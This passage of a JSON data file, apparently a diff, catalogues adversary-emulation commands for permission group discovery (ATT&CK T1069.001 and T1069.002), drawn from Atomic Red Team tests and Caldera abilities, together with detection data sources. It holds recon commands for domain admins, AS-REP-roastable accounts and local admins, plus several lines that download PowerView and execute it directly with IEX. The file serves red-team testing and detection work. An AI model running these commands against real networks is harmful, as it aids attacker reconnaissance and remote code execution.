groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. skipping...\"; fi;\ncat /etc/group\n", + "net localgroup\nnet localgroup \"Administrators\"\n", + "get-localgroup\nGet-LocalGroupMember -Name \"Administrators\"\n", + "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"$env:UserDnsDomain\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"$env:TEMP\\SharpHound.exe\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "New-Item -Path \"$env:TEMP\\SharpHound\\\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"$env:TEMP\\SharpHound\\\"\n", + "wmic.exe group get name\n", + "Get-WMIObject Win32_Group\n", + "gpresult /R\n", + "groups" + ], + "commands": [ + { + "command": "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. skipping...\"; fi;\ncat /etc/group\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "net localgroup\nnet localgroup \"Administrators\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "get-localgroup\nGet-LocalGroupMember -Name \"Administrators\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"$env:UserDnsDomain\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"$env:TEMP\\SharpHound.exe\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "New-Item -Path \"$env:TEMP\\SharpHound\\\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"$env:TEMP\\SharpHound\\\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "wmic.exe group get name\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "Get-WMIObject Win32_Group\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "gpresult /R\n", + "source": "data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml", + "name": "Summary of permission and security groups" + }, + { + "command": "groups", + "source": "data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml", + "name": "Summary of permission and security groups" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1069.001", + "display_name": "Permission Groups Discovery: Local Groups", + "atomic_tests": [ + { + "name": "Permission Groups Discovery (Local)", + "auto_generated_guid": "952931a4-af0b-4335-bbbe-73c8c5b327ae", + "description": "Permission Groups Discovery\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. skipping...\"; fi;\ncat /etc/group\n", + "name": "sh" + } + }, + { + "name": "Basic Permission Groups Discovery Windows (Local)", + "auto_generated_guid": "1f454dd6-e134-44df-bebb-67de70fb6cd8", + "description": "Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net localgroup\nnet localgroup \"Administrators\"\n", + "name": "command_prompt" + } + }, + { + "name": "Permission Groups Discovery PowerShell (Local)", + "auto_generated_guid": "a580462d-2c19-4bc7-8b9a-57a41b7d3ba4", + "description": "Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-localgroup\nGet-LocalGroupMember -Name \"Administrators\"\n", + "name": "powershell" + } + }, + { + "name": "SharpHound3 - LocalAdmin", + "auto_generated_guid": "e03ada14-0980-4107-aff1-7783b2b59bb1", + "description": "This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "FQDN of the targeted domain", + "type": "string", + "default": "$env:UserDnsDomain" + }, + "sharphound_path": { + "description": "SharpHound Windows executable", + "type": "path", + "default": "$env:TEMP\\SharpHound.exe" + }, + "output_path": { + "description": "Output for SharpHound", + "type": "path", + "default": "$env:TEMP\\SharpHound\\" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "SharpHound binary must exist on disk and at specified location (#{sharphound_path}).\nAnd the computer must be domain joined (implicit authentication).\n", + "prereq_command": "if (Test-Path \"#{sharphound_path}\") { exit 0 } else { exit 1 }\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true\" -OutFile \"#{sharphound_path}\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "cleanup_command": "Remove-Item -Recurse #{output_path} -ErrorAction Ignore\n" + } + }, + { + "name": "Wmic Group Discovery", + "auto_generated_guid": "7413be50-be8e-430f-ad4d-07bf197884b2", + "description": "Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic.exe group get name\n", + "name": "powershell" + } + }, + { + "name": "WMIObject Group Discovery", + "auto_generated_guid": "69119e58-96db-4110-ad27-954e48f3bb13", + "description": "Utilizing PowerShell cmdlet - get-wmiobject, to enumerate local groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-WMIObject Win32_Group\n", + "name": "powershell" + } + } + ] + }, + { + "id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2", + "name": "Permission Groups Discovery", + "description": "Summary of permission and security groups", + "tactic": "discovery", + "technique": { + "attack_id": "T1069.001", + "name": "Permission Groups Discovery: Local Groups" + }, + "platforms": { + "windows": { + "psh": { + "command": "gpresult /R\n" + } + }, + "darwin": { + "sh": { + "command": "groups" + } + }, + "linux": { + "sh": { + "command": "groups" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1069.002", + "command_list": [ + "net localgroup\nnet group /domain\nnet group \"domain admins\" /domain\nnet group \"enterprise admins\" /domain\n", + "get-ADPrincipalGroupMembership administrator | select name\n", + "net group /domai \"Domain Admins\"\nnet groups \"Account Operators\" /doma\nnet groups \"Exchange Organization Management\" /doma\nnet group \"BUILTIN\\Backup Operators\" /doma\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName $env:COMPUTERNAME -Verbose\"\n", + "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=group)\n", + "Get-AdGroup -Filter *\n", + "([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n", + "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember \"Domain Admins\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose\n", + "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n", + "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n" + ], + "commands": [ + { + "command": "net localgroup\nnet group /domain\nnet group \"domain admins\" /domain\nnet group \"enterprise admins\" /domain\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "get-ADPrincipalGroupMembership administrator | select name\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "net group /domai \"Domain Admins\"\nnet groups \"Account Operators\" /doma\nnet groups \"Exchange Organization Management\" /doma\nnet group \"BUILTIN\\Backup Operators\" /doma\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName $env:COMPUTERNAME -Verbose\"\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=group)\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "Get-AdGroup -Filter *\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember \"Domain Admins\"\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n", + "source": "data/abilities/discovery/2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml", + "name": "Use PowerView to query the Active Directory server to determine remote admins" + }, + { + "command": "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n", + "source": "data/abilities/discovery/6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml", + "name": "Use PowerView to query the Active Directory server to determine remote admins" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1069.002", + "display_name": "Permission Groups Discovery: Domain Groups", + "atomic_tests": [ + { + "name": "Basic Permission Groups Discovery Windows (Domain)", + "auto_generated_guid": "dd66d77d-8998-48c0-8024-df263dc2ce5d", + "description": "Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net localgroup\nnet group /domain\nnet group \"domain admins\" /domain\nnet group \"enterprise admins\" /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Permission Groups Discovery PowerShell (Domain)", + "auto_generated_guid": "6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7", + "description": "Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user": { + "description": "User to identify what groups a user is a member of", + "type": "String", + "default": "administrator" + } + }, + "executor": { + "command": "get-ADPrincipalGroupMembership #{user} | select name\n", + "name": "powershell" + } + }, + { + "name": "Elevated group enumeration using net group (Domain)", + "auto_generated_guid": "0afb5163-8181-432e-9405-4322710c0c37", + "description": "Runs \"net group\" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This\ntest will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net group /domai \"Domain Admins\"\nnet groups \"Account Operators\" /doma\nnet groups \"Exchange Organization Management\" /doma\nnet group \"BUILTIN\\Backup Operators\" /doma\n", + "name": "command_prompt" + } + }, + { + "name": "Find machines where user has local admin access (PowerView)", + "auto_generated_guid": "a2d71eee-a353-4232-9f86-54f4288dd8c1", + "description": "Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose\n", + "name": "powershell" + } + }, + { + "name": "Find local admins on all machines in domain (PowerView)", + "auto_generated_guid": "a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd", + "description": "Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", + "name": "powershell" + } + }, + { + "name": "Find Local Admins via Group Policy (PowerView)", + "auto_generated_guid": "64fdb43b-5259-467a-b000-1b02c00e510a", + "description": "takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "hostname of the computer to analyze", + "type": "Path", + "default": "$env:COMPUTERNAME" + } + }, + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose\"\n", + "name": "powershell" + } + }, + { + "name": "Enumerate Users Not Requiring Pre Auth (ASRepRoast)", + "auto_generated_guid": "870ba71e-6858-4f6d-895c-bb6237f6121b", + "description": "When successful, accounts that do not require kerberos pre-auth will be returned\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined.\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually.\n" + }, + { + "description": "Requires the Active Directory module for powershell to be installed.\n", + "prereq_command": "if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}\n", + "get_prereq_command": "Add-WindowsCapability -Online -Name \"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n" + } + }, + { + "name": "Adfind - Query Active Directory Groups", + "auto_generated_guid": "48ddc687-82af-40b7-8472-ff1e742e8274", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=group)\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate Active Directory Groups with Get-AdGroup", + "auto_generated_guid": "3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8", + "description": "The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.\nUpon successful execution a listing of groups will output with their paths in AD.\nReference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "command": "Get-AdGroup -Filter *\n" + } + }, + { + "name": "Enumerate Active Directory Groups with ADSISearcher", + "auto_generated_guid": "9f4e344b-8434-41b3-85b1-d38f29d148d0", + "description": "The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.\nUpon successful execution a listing of groups will output with their paths in AD.\nReference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n" + } + }, + { + "name": "Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)", + "auto_generated_guid": "43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8", + "description": "When successful, accounts that do not require kerberos pre-auth will be returned.\nReference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined.\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually.\n" + }, + { + "description": "Requires the Active Directory module for powershell to be installed.\n", + "prereq_command": "if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}\n", + "get_prereq_command": "Add-WindowsCapability -Online -Name \"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n" + } + }, + { + "name": "Get-DomainGroupMember with PowerView", + "auto_generated_guid": "46352f40-f283-4fe5-b56d-d9a71750e145", + "description": "Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember \"Domain Admins\"\n", + "name": "powershell" + } + }, + { + "name": "Get-DomainGroup with PowerView", + "auto_generated_guid": "5a8a181c-2c8e-478d-a943-549305a01230", + "description": "Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose\n", + "name": "powershell" + } + } + ] + }, + { + "id": "2afae782-6d0a-4fbd-a6b6-d1ce90090eac", + "name": "Account-type Admin Enumerator", + "description": "Use PowerView to query the Active Directory server to determine remote admins", + "tactic": "discovery", + "technique": { + "attack_id": "T1069.002", + "name": "Permission Groups Discovery: Domain Groups" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n", + "parsers": { + "plugins.stockpile.app.parsers.netlocalgroup": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "backup.admin.ability", + "edge": "first_failed" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "id": "6d90e6fa-9324-4eb5-93be-9f737245bd7z", + "name": "Discover Domain Admins", + "description": "Use PowerView to query the Active Directory server to determine remote admins", + "tactic": "discovery", + "technique": { + "attack_id": "T1069.002", + "name": "Permission Groups Discovery: Domain Groups" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n", + "parsers": { + "plugins.stockpile.app.parsers.netlocalgroup": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + 